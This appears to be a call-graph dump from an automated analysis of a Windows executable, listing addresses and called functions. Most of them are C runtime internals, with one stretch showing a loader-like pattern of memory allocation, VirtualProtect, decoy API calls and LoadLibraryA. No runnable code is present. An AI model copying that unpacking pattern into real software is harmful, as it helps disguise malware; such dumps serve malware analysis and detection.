9532->9481 9533->9529 9533->9535 9734 40ffc5 GetCPInfo 9535->9734 9867 40e03d LeaveCriticalSection 9536->9867 9538 4105c5 9538->9477 9542 40e03d LeaveCriticalSection 9539->9542 9541 4101fa 9541->9507 9542->9541 9544 4098a2 9543->9544 9547 4098ef 9543->9547 9545 408bf1 __getptd 68 API calls 9544->9545 9546 4098a7 9545->9546 9548 4098cf 9546->9548 9551 40febc 9546->9551 9547->9522 9547->9523 9548->9547 9550 410158 __setmbcp 70 API calls 9548->9550 9550->9547 9552 40fec8 ___lock_fhandle 9551->9552 9553 408bf1 __getptd 68 API calls 9552->9553 9554 40fecd 9553->9554 9555 40fefb 9554->9555 9557 40fedf 9554->9557 9556 40e117 __lock 68 API calls 9555->9556 9558 40ff02 9556->9558 9559 408bf1 __getptd 68 API calls 9557->9559 9566 40fe7e 9558->9566 9561 40fee4 9559->9561 9564 40fef2 ___lock_fhandle 9561->9564 9565 40c2bd __amsg_exit 68 API calls 9561->9565 9564->9548 9565->9564 9567 40fe82 9566->9567 9568 40feb4 9566->9568 9567->9568 9569 40fd56 ___addlocaleref 8 API calls 9567->9569 9574 40ff26 9568->9574 9570 40fe95 9569->9570 9570->9568 9577 40fde5 9570->9577 9733 40e03d LeaveCriticalSection 9574->9733 9576 40ff2d 9576->9561 9578 40fdf6 InterlockedDecrement 9577->9578 9579 40fe79 9577->9579 9580 40fe0b InterlockedDecrement 9578->9580 9581 40fe0e 9578->9581 9579->9568 9591 40fc0d 9579->9591 9580->9581 9582 40fe18 InterlockedDecrement 9581->9582 9583 40fe1b 9581->9583 9582->9583 9584 40fe25 InterlockedDecrement 9583->9584 9585 40fe28 9583->9585 9584->9585 9586 40fe32 InterlockedDecrement 9585->9586 9587 40fe35 9585->9587 9586->9587 9588 40fe4e InterlockedDecrement 9587->9588 9589 40fe5e InterlockedDecrement 9587->9589 9590 40fe69 InterlockedDecrement 9587->9590 9588->9587 9589->9587 9590->9579 9592 40fc91 9591->9592 9600 40fc24 9591->9600 9593 40fcde 9592->9593 9594 408391 ___crtGetEnvironmentStringsA 68 API calls 9592->9594 9612 40fd05 9593->9612 9645 413f2b 9593->9645 9595 40fcb2 9594->9595 9597 408391 ___crtGetEnvironmentStringsA 68 API calls 9595->9597 9602 40fcc5 9597->9602 9598 40fc58 9599 40fc79 9598->9599 9608 408391 ___crtGetEnvironmentStringsA 68 API calls 9598->9608 9603 408391 ___crtGetEnvironmentStringsA 68 API calls 9599->9603 9600->9592 9600->9598 9605 408391 ___crtGetEnvironmentStringsA 68 API calls 9600->9605 9607 408391 ___crtGetEnvironmentStringsA 68 API calls 9602->9607 9609 40fc86 9603->9609 9604 40fd4a 9610 408391 ___crtGetEnvironmentStringsA 68 API calls 9604->9610 9611 40fc4d 9605->9611 9606 408391 ___crtGetEnvironmentStringsA 68 API calls 9606->9612 9613 40fcd3 9607->9613 9614 40fc6e 9608->9614 9616 408391 ___crtGetEnvironmentStringsA 68 API calls 9609->9616 9617 40fd50 9610->9617 9621 414105 9611->9621 9612->9604 9615 408391 68 API calls ___crtGetEnvironmentStringsA 9612->9615 9619 408391 ___crtGetEnvironmentStringsA 68 API calls 9613->9619 9637 4140c0 9614->9637 9615->9612 9616->9592 9617->9568 9619->9593 9622 414112 9621->9622 9636 41418f 9621->9636 9623 408391 ___crtGetEnvironmentStringsA 68 API calls 9622->9623 9625 414123 9622->9625 9623->9625 9624 414147 9629 414159 9624->9629 9630 408391 ___crtGetEnvironmentStringsA 68 API calls 9624->9630 9626 408391 ___crtGetEnvironmentStringsA 68 API calls 9625->9626 9627 414135 9625->9627 9626->9627 9627->9624 9628 408391 ___crtGetEnvironmentStringsA 68 API calls 9627->9628 9628->9624 9631 41416b 9629->9631 9632 408391 ___crtGetEnvironmentStringsA 68 API calls 9629->9632 9630->9629 9633 41417d 9631->9633 9634 408391 ___crtGetEnvironmentStringsA 68 API calls 9631->9634 9632->9631 9635 408391 ___crtGetEnvironmentStringsA 68 API calls 9633->9635 9633->9636 9634->9633 9635->9636 9636->9598 9638 414101 9637->9638 9639 4140cd 9637->9639 9638->9599 9640 4140dd 9639->9640 9641 408391 ___crtGetEnvironmentStringsA 68 API calls 9639->9641 9642 4140ef 9640->9642 9643 408391 ___crtGetEnvironmentStringsA 68 API calls 9640->9643 9641->9640 9642->9638 9644 408391 ___crtGetEnvironmentStringsA 68 API calls 9642->9644 9643->9642 9644->9638 9646 413f3c 9645->9646 9732 40fcfe 9645->9732 9647 408391 ___crtGetEnvironmentStringsA 68 API calls 9646->9647 9648 413f44 9647->9648 9649 408391 ___crtGetEnvironmentStringsA 68 API calls 9648->9649 9650 413f4c 9649->9650 9651 408391 ___crtGetEnvironmentStringsA 68 API calls 9650->9651 9652 413f54 9651->9652 9653 408391 ___crtGetEnvironmentStringsA 68 API calls 9652->9653 9654 413f5c 9653->9654 9655 408391 ___crtGetEnvironmentStringsA 68 API calls 9654->9655 9656 413f64 9655->9656 9657 408391 ___crtGetEnvironmentStringsA 68 API calls 9656->9657 9658 413f6c 9657->9658 9659 408391 ___crtGetEnvironmentStringsA 68 API calls 9658->9659 9660 413f73 9659->9660 9661 408391 ___crtGetEnvironmentStringsA 68 API calls 9660->9661 9662 413f7b 9661->9662 9663 408391 ___crtGetEnvironmentStringsA 68 API calls 9662->9663 9664 413f83 9663->9664 9665 408391 ___crtGetEnvironmentStringsA 68 API calls 9664->9665 9666 413f8b 9665->9666 9667 408391 ___crtGetEnvironmentStringsA 68 API calls 9666->9667 9668 413f93 9667->9668 9669 408391 ___crtGetEnvironmentStringsA 68 API calls 9668->9669 9670 413f9b 9669->9670 9671 408391 ___crtGetEnvironmentStringsA 68 API calls 9670->9671 9672 413fa3 9671->9672 9673 408391 ___crtGetEnvironmentStringsA 68 API calls 9672->9673 9674 413fab 9673->9674 9675 408391 ___crtGetEnvironmentStringsA 68 API calls 9674->9675 9676 413fb3 9675->9676 9677 408391 ___crtGetEnvironmentStringsA 68 API calls 9676->9677 9678 413fbb 9677->9678 9679 408391 ___crtGetEnvironmentStringsA 68 API calls 9678->9679 9680 413fc6 9679->9680 9681 408391 ___crtGetEnvironmentStringsA 68 API calls 9680->9681 9682 413fce 9681->9682 9683 408391 ___crtGetEnvironmentStringsA 68 API calls 9682->9683 9684 413fd6 9683->9684 9685 408391 ___crtGetEnvironmentStringsA 68 API calls 9684->9685 9686 413fde 9685->9686 9687 408391 ___crtGetEnvironmentStringsA 68 API calls 9686->9687 9688 413fe6 9687->9688 9689 408391 ___crtGetEnvironmentStringsA 68 API calls 9688->9689 9690 413fee 9689->9690 9691 408391 ___crtGetEnvironmentStringsA 68 API calls 9690->9691 9692 413ff6 9691->9692 9693 408391 ___crtGetEnvironmentStringsA 68 API calls 9692->9693 9694 413ffe 9693->9694 9695 408391 ___crtGetEnvironmentStringsA 68 API calls 9694->9695 9696 414006 9695->9696 9697 408391 ___crtGetEnvironmentStringsA 68 API calls 9696->9697 9698 41400e 9697->9698 9699 408391 ___crtGetEnvironmentStringsA 68 API calls 9698->9699 9700 414016 9699->9700 9701 408391 ___crtGetEnvironmentStringsA 68 API calls 9700->9701 9702 41401e 9701->9702 9703 408391 ___crtGetEnvironmentStringsA 68 API calls 9702->9703 9704 414026 9703->9704 9705 408391 ___crtGetEnvironmentStringsA 68 API calls 9704->9705 9706 41402e 9705->9706 9707 408391 ___crtGetEnvironmentStringsA 68 API calls 9706->9707 9708 414036 9707->9708 9709 408391 ___crtGetEnvironmentStringsA 68 API calls 9708->9709 9710 41403e 9709->9710 9711 408391 ___crtGetEnvironmentStringsA 68 API calls 9710->9711 9712 41404c 9711->9712 9713 408391 ___crtGetEnvironmentStringsA 68 API calls 9712->9713 9714 414057 9713->9714 9715 408391 ___crtGetEnvironmentStringsA 68 API calls 9714->9715 9716 414062 9715->9716 9717 408391 ___crtGetEnvironmentStringsA 68 API calls 9716->9717 9718 41406d 9717->9718 9719 408391 ___crtGetEnvironmentStringsA 68 API calls 9718->9719 9720 414078 9719->9720 9721 408391 ___crtGetEnvironmentStringsA 68 API calls 9720->9721 9722 414083 9721->9722 9723 408391 ___crtGetEnvironmentStringsA 68 API calls 9722->9723 9724 41408e 9723->9724 9725 408391 ___crtGetEnvironmentStringsA 68 API calls 9724->9725 9726 414099 9725->9726 9727 408391 ___crtGetEnvironmentStringsA 68 API calls 9726->9727 9728 4140a4 9727->9728 9729 408391 ___crtGetEnvironmentStringsA 68 API calls 9728->9729 9730 4140af 9729->9730 9731 408391 ___crtGetEnvironmentStringsA 68 API calls 9730->9731 9731->9732 9732->9606 9733->9576 9735 4100ab 9734->9735 9740 40fff9 _memset 9734->9740 9739 407aab __atodbl_l 5 API calls 9735->9739 9742 410156 9739->9742 9744 4143c0 9740->9744 9742->9535 9743 4148b5 ___crtLCMapStringA 103 API calls 9743->9735 9745 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 9744->9745 9746 4143d3 9745->9746 9754 414206 9746->9754 9749 4148b5 9750 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 9749->9750 9751 4148c8 9750->9751 9820 414510 9751->9820 9755 414252 9754->9755 9756 414227 GetStringTypeW 9754->9756 9758 41423f 9755->9758 9759 414339 9755->9759 9757 414247 GetLastError 9756->9757 9756->9758 9757->9755 9760 41428b MultiByteToWideChar 9758->9760 9777 414333 9758->9777 9782 415b8c GetLocaleInfoA 9759->9782 9766 4142b8 9760->9766 9760->9777 9762 407aab __atodbl_l 5 API calls 9764 410066 9762->9764 9764->9749 9765 41438a GetStringTypeA 9770 4143a5 9765->9770 9765->9777 9767 4082c7 _malloc 68 API calls 9766->9767 9771 4142cd _memset __crtLCMapStringA_stat 9766->9771 9767->9771 9769 414306 MultiByteToWideChar 9773 41432d 9769->9773 9774 41431c GetStringTypeW 9769->9774 9775 408391 ___crtGetEnvironmentStringsA 68 API calls 9770->9775 9771->9769 9771->9777 9778 414193 9773->9778 9774->9773 9775->9777 9777->9762 9779 4141b0 9778->9779 9780 41419f 9778->9780 9779->9777 9780->9779 9781 408391 ___crtGetEnvironmentStringsA 68 API calls 9780->9781 9781->9779 9783 415bba 9782->9783 9784 415bbf 9782->9784 9786 407aab __atodbl_l 5 API calls 9783->9786 9813 40701f 9784->9813 9787 41435d 9786->9787 9787->9765 9787->9777 9788 415bd5 9787->9788 9789 415c15 GetCPInfo 9788->9789 9793 415c9f 9788->9793 9790 415c8a MultiByteToWideChar 9789->9790 9791 415c2c 9789->9791 9790->9793 9797 415c45 _strlen 9790->9797 9791->9790 9794 415c32 GetCPInfo 9791->9794 9792 407aab __atodbl_l 5 API calls 9795 41437e 9792->9795 9793->9792 9794->9790 9796 415c3f 9794->9796 9795->9765 9795->9777 9796->9790 9796->9797 9798 4082c7 _malloc 68 API calls 9797->9798 9800 415c77 _memset __crtLCMapStringA_stat 9797->9800 9798->9800 9799 415cd4 MultiByteToWideChar 9801 415d0b 9799->9801 9802 415cec 9799->9802 9800->9793 9800->9799 9805 414193 __freea 68 API calls 9801->9805 9803 415d10 9802->9803 9804 415cf3 WideCharToMultiByte 9802->9804 9806 415d1b WideCharToMultiByte 9803->9806 9807 415d2f 9803->9807 9804->9801 9805->9793 9806->9801 9806->9807 9808 41065a __calloc_crt 68 API calls 9807->9808 9809 415d37 9808->9809 9809->9801 9810 415d40 WideCharToMultiByte 9809->9810 9810->9801 9811 415d52 9810->9811 9812 408391 ___crtGetEnvironmentStringsA 68 API calls 9811->9812 9812->9801 9816 40b68b 9813->9816 9817 40b6a4 9816->9817 9818 40b45c __wcstoi64 92 API calls 9817->9818 9819 407030 9818->9819 9819->9783 9821 414531 LCMapStringW 9820->9821 9825 41454c 9820->9825 9822 414554 GetLastError 9821->9822 9821->9825 9822->9825 9823 41474a 9827 415b8c ___ansicp 92 API calls 9823->9827 9824 4145a6 9826 4145bf MultiByteToWideChar 9824->9826 9845 414741 9824->9845 9825->9823 9825->9824 9836 4145ec 9826->9836 9826->9845 9829 414772 9827->9829 9828 407aab __atodbl_l 5 API calls 9831 410086 9828->9831 9832 414866 LCMapStringA 9829->9832 9833 41478b 9829->9833 9829->9845 9830 414605 __crtLCMapStringA_stat 9835 41463d MultiByteToWideChar 9830->9835 9830->9845 9831->9743 9841 4147c2 9832->9841 9834 415bd5 ___convertcp 75 API calls 9833->9834 9838 41479d 9834->9838 9839 414656 LCMapStringW 9835->9839 9840 414738 9835->9840 9836->9830 9837 4082c7 _malloc 68 API calls 9836->9837 9837->9830 9844 4147a7 LCMapStringA 9838->9844 9838->9845 9839->9840 9847 414677 9839->9847 9846 414193 __freea 68 API calls 9840->9846 9842 41488d 9841->9842 9843 408391 ___crtGetEnvironmentStringsA 68 API calls 9841->9843 9842->9845 9849 408391 ___crtGetEnvironmentStringsA 68 API calls 9842->9849 9843->9842 9844->9841 9852 4147c9 9844->9852 9845->9828 9846->9845 9848 414680 9847->9848 9851 4146a9 9847->9851 9848->9840 9850 414692 LCMapStringW 9848->9850 9849->9845 9850->9840 9854 4146c4 __crtLCMapStringA_stat 9851->9854 9856 4082c7 _malloc 68 API calls 9851->9856 9855 4147da _memset __crtLCMapStringA_stat 9852->9855 9857 4082c7 _malloc 68 API calls 9852->9857 9853 4146f8 LCMapStringW 9858 414710 WideCharToMultiByte 9853->9858 9859 414732 9853->9859 9854->9840 9854->9853 9855->9841 9861 414818 LCMapStringA 9855->9861 9856->9854 9857->9855 9858->9859 9860 414193 __freea 68 API calls 9859->9860 9860->9840 9863 414834 9861->9863 9864 414838 9861->9864 9866 414193 __freea 68 API calls 9863->9866 9865 415bd5 ___convertcp 75 API calls 9864->9865 9865->9863 9866->9841 9867->9538 9870 4116d1 9868->9870 9869 40892a __encode_pointer 7 API calls 9869->9870 9870->9869 9871 4116e9 9870->9871 9871->9024 9875 40c1b3 9872->9875 9874 40c1fc 9874->9026 9876 40c1bf ___lock_fhandle 9875->9876 9883 40c329 9876->9883 9882 40c1e0 ___lock_fhandle 9882->9874 9884 40e117 __lock 68 API calls 9883->9884 9885 40c1c4 9884->9885 9886 40c0c8 9885->9886 9887 4089a5 __decode_pointer 6 API calls 9886->9887 9888 40c0dc 9887->9888 9889 4089a5 __decode_pointer 6 API calls 9888->9889 9890 40c0ec 9889->9890 9891 40c16f 9890->9891 9906 4134fc 9890->9906 9903 40c1e9 9891->9903 9893 40c156 9894 40892a __encode_pointer 7 API calls 9893->9894 9895 40c164 9894->9895 9898 40892a __encode_pointer 7 API calls 9895->9898 9896 40c12e 9896->9891 9900 4106a6 __realloc_crt 74 API calls 9896->9900 9901 40c144 9896->9901 9897 40c10a 9897->9893 9897->9896 9919 4106a6 9897->9919 9898->9891 9900->9901 9901->9891 9902 40892a __encode_pointer 7 API calls 9901->9902 9902->9893 9968 40c332 9903->9968 9907 413508 ___lock_fhandle 9906->9907 9908 413535 9907->9908 9909 413518 9907->9909 9911 413576 HeapSize 9908->9911 9914 40e117 __lock 68 API calls 9908->9914 9910 407e97 __cftoe_l 68 API calls 9909->9910 9913 41351d 9910->9913 9912 41352d ___lock_fhandle 9911->9912 9912->9897 9915 406b09 __cftoe_l 6 API calls 9913->9915 9916 413545 ___sbh_find_block 9914->9916 9915->9912 9924 413596 9916->9924 9920 4106af 9919->9920 9922 4106ee 9920->9922 9923 4106cf Sleep 9920->9923 9928 414a18 9920->9928 9922->9896 9923->9920 9927 40e03d LeaveCriticalSection 9924->9927 9926 413571 9926->9911 9926->9912 9927->9926 9929 414a24 ___lock_fhandle 9928->9929 9930 414a39 9929->9930 9931 414a2b 9929->9931 9932 414a40 9930->9932 9933 414a4c 9930->9933 9934 4082c7 _malloc 68 API calls 9931->9934 9935 408391 ___crtGetEnvironmentStringsA 68 API calls 9932->9935 9940 414bbe 9933->9940 9962 414a59 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 9933->9962 9950 414a33 ___lock_fhandle _realloc 9934->9950 9935->9950 9936 414bf1 9938 40c215 _realloc 6 API calls 9936->9938 9937 414bc3 HeapReAlloc 9937->9940 9937->9950 9941 414bf7 9938->9941 9939 40e117 __lock 68 API calls 9939->9962 9940->9936 9940->9937 9942 414c15 9940->9942 9944 40c215 _realloc 6 API calls 9940->9944 9946 414c0b 9940->9946 9943 407e97 __cftoe_l 68 API calls 9941->9943 9945 407e97 __cftoe_l 68 API calls 9942->9945 9942->9950 9943->9950 9944->9940 9947 414c1e GetLastError 9945->9947 9949 407e97 __cftoe_l 68 API calls 9946->9949 9947->9950 9951 414b8c 9949->9951 9950->9920 9951->9950 9953 414b91 GetLastError 9951->9953 9952 414ae4 HeapAlloc 9952->9962 9953->9950 9954 414b39 HeapReAlloc 9954->9962 9955 40e929 ___sbh_alloc_block 5 API calls 9955->9962 9956 414ba4 9956->9950 9958 407e97 __cftoe_l 68 API calls 9956->9958 9957 40c215 _realloc 6 API calls 9957->9962 9960 414bb1 9958->9960 9959 414b87 9961 407e97 __cftoe_l 68 API calls 9959->9961 9960->9947 9960->9950 9961->9951 9962->9936 9962->9939 9962->9950 9962->9952 9962->9954 9962->9955 9962->9956 9962->9957 9962->9959 9963 40e17a __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 9962->9963 9964 414b5c 9962->9964 9963->9962 9967 40e03d LeaveCriticalSection 9964->9967 9966 414b63 9966->9962 9967->9966 9971 40e03d LeaveCriticalSection 9968->9971 9970 40c1ee 9970->9882 9971->9970 9975 41389a 9972->9975 9976 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 9975->9976 9977 4138ad 9976->9977 9977->9031 9981 4059c9 9978->9981 9979 4059d3 GetLastError 9980 406342 GetGeoInfoA GetSystemDefaultLCID 9979->9980 9979->9981 9980->9981 9982 406364 GlobalAlloc VirtualProtect 9980->9982 9981->9979 9981->9980 9981->9982 9983 4063a3 6 API calls 9982->9983 10013 406456 ctype 9982->10013 10016 406bf3 9983->10016 9984 4064e3 9988 406540 9984->9988 9992 40651c LocalAlloc GetBinaryTypeW CreateMutexA 9984->9992 9985 40649a FoldStringA 10075 406744 9985->10075 9994 40656d ConvertFiberToThread SetFileAttributesW AddAtomA SetFileShortNameW 9988->9994 9996 406599 9988->9996 9992->9984 9994->9988 9995 4064c0 10090 406c0a 9995->10090 10119 405800 9996->10119 9998 406410 10032 406870 9998->10032 10001 4064d5 10003 40701f ___ansicp 92 API calls 10001->10003 10002 406440 10043 406d40 10002->10043 10005 4064db 10003->10005 10113 406f8a 10005->10113 10006 40659e 10007 4065d9 GetFileAttributesExW GetFileType LocalAlloc WritePrivateProfileStringA DeregisterEventSource 10006->10007 10010 406613 GetConsoleAliasA 10006->10010 10012 40662e 10006->10012 10007->10006 10008 40644e 10054 407035 10008->10054 10010->10006 10014 40665c 8 API calls 10012->10014 10015 4066af LoadLibraryA 10012->10015 10013->9984 10013->9985 10014->10012 10015->9035 10124 406b2f 10016->10124 10018 406408 10019 40721e 10018->10019 10023 40722a ___lock_fhandle 10019->10023 10020 407238 10021 407e97 __cftoe_l 68 API calls 10020->10021 10024 40723d 10021->10024 10022 407266 10574 408f9e 10022->10574 10023->10020 10023->10022 10026 406b09 __cftoe_l 6 API calls 10024->10026 10031 40724d ___lock_fhandle 10026->10031 10031->9998 10033 40687d 10032->10033 10036 4086e3 __ctrlfp __floor_pentium4 10032->10036 10034 4068ae 10033->10034 10033->10036 10041 4068f8 10034->10041 10653 40841f 10034->10653 10035 408750 __floor_pentium4 10040 40873d __ctrlfp 10035->10040 10669 40f307 10035->10669 10036->10035 10039 40872d 10036->10039 10036->10040 10662 40f2b2 10039->10662 10040->10002 10041->10002 10044 40a7da __ctrlfp __floor_pentium4 10043->10044 10045 406d4d 10043->10045 10047 40a847 __floor_pentium4 10044->10047 10050 40a824 10044->10050 10051 40a834 __ctrlfp 10044->10051 10045->10044 10046 406d7e 10045->10046 10049 40841f ___libm_error_support 68 API calls 10046->10049 10052 406dc8 10046->10052 10048 40f307 __except1 69 API calls 10047->10048 10047->10051 10048->10051 10049->10052 10053 40f2b2 __floor_pentium4 68 API calls 10050->10053 10051->10008 10052->10008 10053->10051 10056 407041 ___lock_fhandle __stbuf 10054->10056 10055 407055 10057 407e97 __cftoe_l 68 API calls 10055->10057 10056->10055 10060 4070df __stbuf 10056->10060 10061 40a7a8 __fileno 68 API calls 10056->10061 10058 40705a 10057->10058 10059 406b09 __cftoe_l 6 API calls 10058->10059 10063 40706a ___lock_fhandle 10059->10063 10062 408fdf __getstream 69 API calls 10060->10062 10065 407088 10061->10065 10064 4070ef __stbuf 10062->10064 10063->10013 10702 4097bf 10064->10702 10065->10055 10065->10060 10067 407102 __stbuf _strlen 10709 40b81a 10067->10709 10070 407135 __stbuf 10742 40985b 10070->10742 10073 407122 __stbuf 10073->10070 10721 40b6b6 10073->10721 10076 406753 10075->10076 10080 4064b6 10075->10080 10077 407e97 __cftoe_l 68 API calls 10076->10077 10078 406758 10077->10078 10079 406b09 __cftoe_l 6 API calls 10078->10079 10079->10080 10081 40698d 10080->10081 10082 4069b7 10081->10082 10083 40699a 10081->10083 10082->10083 10085 4069be 10082->10085 10084 407e97 __cftoe_l 68 API calls 10083->10084 10086 40699f 10084->10086 10798 408854 10085->10798 10088 406b09 __cftoe_l 6 API calls 10086->10088 10089 4069af 10088->10089 10089->9995 10091 406c16 ___lock_fhandle 10090->10091 10092 406c29 10091->10092 10093 406c55 10091->10093 10094 407e97 __cftoe_l 68 API calls 10092->10094 10095 408f9e __lock_file 69 API calls 10093->10095 10096 406c2e 10094->10096 10098 406c5e 10095->10098 10097 406b09 __cftoe_l 6 API calls 10096->10097 10104 406c3e ___lock_fhandle 10097->10104 10099 406cd8 10098->10099 10100 40a7a8 __fileno 68 API calls 10098->10100 10101 406d04 10099->10101 10103 4097bf __stbuf 68 API calls 10099->10103 10110 406c6e 10100->10110 10865 406d1c 10101->10865 10105 406cea 10103->10105 10104->10001 10845 4099bc 10105->10845 10108 407e97 __cftoe_l 68 API calls 10111 406cc8 10108->10111 10109 40985b __ftbuf 102 API calls 10109->10101 10110->10099 10110->10108 10112 406b09 __cftoe_l 6 API calls 10111->10112 10112->10099 10114 406f96 ___lock_fhandle 10113->10114 10115 408bf1 __getptd 68 API calls 10114->10115 10118 406f9b 10115->10118 10871 40b345 10118->10871 10121 40580d __write_nolock 10119->10121 10120 405956 10120->10006 10121->10120 10122 40584b 17 API calls 10121->10122 10938 405630 10121->10938 10122->10121 10127 406b3b ___lock_fhandle 10124->10127 10125 406b4e 10126 407e97 __cftoe_l 68 API calls 10125->10126 10128 406b53 10126->10128 10127->10125 10129 406b83 10127->10129 10130 406b09 __cftoe_l 6 API calls 10128->10130 10143 409345 10129->10143 10132 406b63 ___lock_fhandle @_EH4_CallFilterFunc@8 10130->10132 10132->10018 10133 406b88 10134 406b9c 10133->10134 10135 406b8f 10133->10135 10137 406bc3 10134->10137 10138 406ba3 10134->10138 10136 407e97 __cftoe_l 68 API calls 10135->10136 10136->10132 10161 40907c 10137->10161 10139 407e97 __cftoe_l 68 API calls 10138->10139 10139->10132 10144 409351 ___lock_fhandle 10143->10144 10145 40e117 __lock 68 API calls 10144->10145 10155 40935f 10145->10155 10146 4093d4 10196 409474 10146->10196 10147 4093db 10149 410615 __malloc_crt 68 API calls 10147->10149 10151 4093e5 10149->10151 10150 409469 ___lock_fhandle 10150->10133 10151->10146 10152 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10151->10152 10156 40940a 10152->10156 10153 40e054 __mtinitlocknum 68 API calls 10153->10155 10155->10146 10155->10147 10155->10153 10186 408fdf 10155->10186 10191 40904d 10155->10191 10157 409415 10156->10157 10158 409428 EnterCriticalSection 10156->10158 10160 408391 ___crtGetEnvironmentStringsA 68 API calls 10157->10160 10158->10146 10160->10146 10162 40909e 10161->10162 10163 4090b2 10162->10163 10175 4090d1 10162->10175 10164 407e97 __cftoe_l 68 API calls 10163->10164 10166 4090b7 10164->10166 10165 40928e 10168 4092e4 10165->10168 10169 4092fe 10165->10169 10167 406b09 __cftoe_l 6 API calls 10166->10167 10173 406bce 10167->10173 10171 407e97 __cftoe_l 68 API calls 10168->10171 10207 410f7e 10169->10207 10172 4092e9 10171->10172 10174 406b09 __cftoe_l 6 API calls 10172->10174 10183 406be9 10173->10183 10174->10173 10175->10165 10175->10168 10201 41134d 10175->10201 10180 4111c9 __fassign 103 API calls 10181 4092a7 10180->10181 10181->10165 10182 4111c9 __fassign 103 API calls 10181->10182 10182->10165 10567 409011 10183->10567 10185 406bf1 10185->10132 10187 409002 EnterCriticalSection 10186->10187 10188 408fec 10186->10188 10187->10155 10189 40e117 __lock 68 API calls 10188->10189 10190 408ff5 10189->10190 10190->10155 10192 409070 LeaveCriticalSection 10191->10192 10193 40905d 10191->10193 10192->10155 10199 40e03d LeaveCriticalSection 10193->10199 10195 40906d 10195->10155 10200 40e03d LeaveCriticalSection 10196->10200 10198 40947b 10198->10150 10199->10195 10200->10198 10210 4111e3 10201->10210 10203 409259 10203->10168 10204 4111c9 10203->10204 10223 410f9e 10204->10223 10263 410eb2 10207->10263 10209 410f99 10209->10173 10211 4111fa 10210->10211 10217 4111f3 _strncmp 10210->10217 10212 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10211->10212 10213 411206 10212->10213 10214 411264 10213->10214 10215 411239 10213->10215 10213->10217 10214->10217 10219 407e97 __cftoe_l 68 API calls 10214->10219 10216 407e97 __cftoe_l 68 API calls 10215->10216 10218 41123e 10216->10218 10217->10203 10220 406b09 __cftoe_l 6 API calls 10218->10220 10221 411271 10219->10221 10220->10217 10222 406b09 __cftoe_l 6 API calls 10221->10222 10222->10217 10224 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10223->10224 10225 410fb2 10224->10225 10226 410fd4 10225->10226 10227 410ffa 10225->10227 10237 409287 10225->10237 10238 41522c 10226->10238 10228 41102d 10227->10228 10229 410fff 10227->10229 10233 407e97 __cftoe_l 68 API calls 10228->10233 10228->10237 10231 407e97 __cftoe_l 68 API calls 10229->10231 10232 411004 10231->10232 10234 406b09 __cftoe_l 6 API calls 10232->10234 10235 41103a 10233->10235 10234->10237 10236 406b09 __cftoe_l 6 API calls 10235->10236 10236->10237 10237->10165 10237->10180 10239 41523c 10238->10239 10245 41526e 10238->10245 10240 415241 10239->10240 10239->10245 10242 407e97 __cftoe_l 68 API calls 10240->10242 10244 415246 10242->10244 10243 415256 10243->10237 10246 406b09 __cftoe_l 6 API calls 10244->10246 10247 41513a 10245->10247 10246->10243 10248 415150 10247->10248 10261 415175 ___ascii_strnicmp 10247->10261 10249 40988f _LocaleUpdate::_LocaleUpdate 78 API calls 10248->10249 10250 41515b 10249->10250 10251 415160 10250->10251 10252 415195 10250->10252 10253 407e97 __cftoe_l 68 API calls 10251->10253 10254 41519f 10252->10254 10262 4151c7 10252->10262 10255 415165 10253->10255 10256 407e97 __cftoe_l 68 API calls 10254->10256 10257 406b09 __cftoe_l 6 API calls 10255->10257 10258 4151a4 10256->10258 10257->10261 10259 406b09 __cftoe_l 6 API calls 10258->10259 10259->10261 10260 41534c 103 API calls __tolower_l 10260->10262 10261->10243 10262->10260 10262->10261 10266 410ebe ___lock_fhandle 10263->10266 10264 410ed1 10265 407e97 __cftoe_l 68 API calls 10264->10265 10267 410ed6 10265->10267 10266->10264 10268 410f0f 10266->10268 10269 406b09 __cftoe_l 6 API calls 10267->10269 10274 410793 10268->10274 10273 410ee5 ___lock_fhandle 10269->10273 10273->10209 10275 4107b8 10274->10275 10334 415101 10275->10334 10278 4069e1 __invoke_watson 10 API calls 10283 4107e3 10278->10283 10279 41081c 10340 407eaa 10279->10340 10282 407e97 __cftoe_l 68 API calls 10284 41082b 10282->10284 10283->10279 10286 4108dc 10283->10286 10285 406b09 __cftoe_l 6 API calls 10284->10285 10320 41083a 10285->10320 10343 413281 10286->10343 10288 41097e 10289 410985 10288->10289 10290 41099f CreateFileA 10288->10290 10291 407eaa __write_nolock 68 API calls 10289->10291 10292 410a39 GetFileType 10290->10292 10293 4109cc 10290->10293 10296 41098a 10291->10296 10294 410a46 GetLastError 10292->10294 10295 410a8a 10292->10295 10297 410a05 GetLastError 10293->10297 10300 4109e0 CreateFileA 10293->10300 10298 407ebd __dosmaperr 68 API calls 10294->10298 10366 41303c 10295->10366 10299 407e97 __cftoe_l 68 API calls 10296->10299 10361 407ebd 10297->10361 10302 410a6f CloseHandle 10298->10302 10303 410994 10299->10303 10300->10292 10300->10297 10302->10303 10304 410a7d 10302->10304 10307 407e97 __cftoe_l 68 API calls 10303->10307 10306 407e97 __cftoe_l 68 API calls 10304->10306 10306->10303 10307->10320 10308 410cc8 10311 410e35 CloseHandle CreateFileA 10308->10311 10308->10320 10313 410e60 GetLastError 10311->10313 10311->10320 10314 407ebd __dosmaperr 68 API calls 10313->10314 10317 410e6c 10314->10317 10315 407eaa __write_nolock 68 API calls 10326 410b1e 10315->10326 10316 41393b 78 API calls __read_nolock 10316->10326 10456 4130bd 10317->10456 10319 40b97c 70 API calls __lseek_nolock 10319->10326 10330 410f50 10320->10330 10324 40f63d 70 API calls __lseeki64_nolock 10324->10326 10325 410d30 10327 414edc __close_nolock 71 API calls 10325->10327 10326->10308 10326->10316 10326->10319 10326->10324 10326->10325 10385 414edc 10326->10385 10400 414d26 10326->10400 10431 412f17 10326->10431 10328 410d37 10327->10328 10329 407e97 __cftoe_l 68 API calls 10328->10329 10329->10320 10331 410f7c 10330->10331 10332 410f55 10330->10332 10331->10273 10566 41325a LeaveCriticalSection 10332->10566 10335 415110 10334->10335 10339 4107d4 10334->10339 10336 407e97 __cftoe_l 68 API calls 10335->10336 10337 415115 10336->10337 10338 406b09 __cftoe_l 6 API calls 10337->10338 10338->10339 10339->10278 10339->10283 10341 408b78 